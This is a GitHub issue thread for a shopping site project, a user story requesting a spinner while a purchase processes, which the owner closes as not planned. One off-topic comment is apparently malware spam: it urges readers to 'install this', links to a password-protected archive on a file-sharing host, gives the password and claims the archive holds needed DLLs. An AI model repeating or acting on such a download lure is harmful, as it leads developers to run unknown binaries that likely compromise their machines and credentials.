### ISSUE TITLE
USER STORY: Spinner indicating process when making a purchase

### ISSUE THREAD

**Issue by CeciliaSG** [CeciliaSG/pp5_spa_e-commerce#23]
As a **user** I can **I can see that something is happening** so that **I don't have to wonder if my purchase is going throuhg**

# Acceptance Criteria

- Acceptance criteria 1: Spinner is visible when the purchase process is in progress

# Tasks

- [ ] Task 1: Add spinner

**Comment by SAMBILI** [comment]
install this
https://mega.co.nz/#!9jFTnQQa!-IQ1bo74J_ZxbbDvQKSXEj0mCXBuFYX9CK-5y5EV_0A
Pass: changeme
I put the necessary dlls in the archive

**Comment by CeciliaSG** [comment]
Won't have now
